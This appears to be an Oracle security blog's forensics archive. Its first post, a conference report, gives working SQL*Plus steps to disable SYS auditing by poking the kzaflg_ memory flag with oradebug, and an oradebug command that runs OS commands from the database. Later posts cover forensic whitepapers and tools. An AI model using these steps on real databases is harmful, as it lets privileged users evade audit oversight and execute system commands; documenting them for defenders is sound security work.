Archive for the ‘Forensics’ Category

Disable Auditing and running OS commands using oradebug

Samstag, September 17th, 2011

Currently I am staying at the Hacktivity 2011 conference in Budapest. I talked about Oracle Forensics (pdf of the presentation).The second talk was given by Laszlo Toth.  He showed at lot of interesting things, e.g. how to disable Oracle Audit and SYS Auditing using oradebug. His presentation will be available soon on his sooner or later webpage soonerorlater.hu.

oradebug is an undocumented (from Oracle) feature in all versions of Oracle which allows powerful activities if you have SYSDBA privileges (and getting SYSDBA privileges is easy as DBA). The peek/poke statement allows to read/modify the memory of the database:

Sample – disable Oracle SYS Auditing:


sqlplus / as sysdba

SQL> — get the offset for oradebug

SQL> select fsv.KSMFSNAM,sga.*
from x$ksmfsv fsv, x$ksmmem sga
where sga.addr=fsv.KSMFSADR
and fsv.ksmfsnam like ‚kzaflg_%‘;

KSMFSNAM ADDR INDX INST_ID KSMMMVAL
—————- ———- ———- —————-
kzaflg_ 0000000060031BB0 26652 1 0000000000000001

SQL> show parameter audit;

NAME TYPE VALUE
———————————— ———– ——————————
audit_file_dest string /u01/app/oracle/admin/PSALES/adump
audit_sys_operations boolean TRUE
audit_syslog_level string
audit_trail string DB, EXTENDED

SQL> oradebug poke 0x60031bb0 1 0
BEFORE: [060031BB0, 060031BB4) = 00000001
AFTER: [060031BB0, 060031BB4) = 00000000

oradebug can also be used to disable standard auditing. oradebug makes Oracle products like Oracle Auditvault nearly useless because Oracle Auditvault relies on Oracle native auditing. A (SYS)DBA can switch off auditing for a few seconds, do activities without being audited and switch auditing on again. .

Another trick from Laszlo’s presentation was how to use oradebug to call OS commands via the database

SQL> oradebug call system „ls -la >/tmp/hacktivity.txt“

Later I will talk about Laszlo’s trick how to disable the Oracle authentication using oradebug.

Blackhat Training „HACKING AND SECURING ORACLE (2 days) „

Mittwoch, April 13th, 2011

Oracle Java Forensics

Mittwoch, März 31st, 2010

Paul released a new article about Oracle Java Forensics. He describes how to find traces of Java attacks (e.g. via dbms_jvm_exp_perms) in the Oracle database.

I’ve got some nice ideas from Paul’s article.

Well done.

David Litchfield has published a whitepaper on Oracle forensics

Donnerstag, November 27th, 2008

David Litchfield has posted a new whitepaper „Using the Oracle System Change Number in Forensic Investigations„. He published also 2 tools called oratime and orablock. Oratime is converting a SCN to a timestamp. 

C:\oratools>oratime 671406483

21/11/2008 21:48:03

 

 The second tool from the whitepaper „orablock“ can extract data from a data block.

 

C:\cadfile>orablock

Orablock v1.0

(c) David Litchfield

(david@davidlitchfield.com)

-h (show help)

-f data_file (required)

-c column_template

-z block_size (default 8192)

-o object_id

-b block_number

-s seperator (default newline)

-a action

Actions are:

A DUMPALL

D SHOWDELETED

O DUMPNOTVIAOFFSETS

S SHOWDELETEDNOTVIAOFFSETS

C DUMPSCNS

 

David’s Whitepaper about Oracle Forensics

Sonntag, August 12th, 2007

David Litchfield just released the 5th part of his Oracle Forensics whitepaper “Finding Evidence of Data Theft in the Absence of Auditing“. He describes how to find traces if the attacker used only SELECT statements.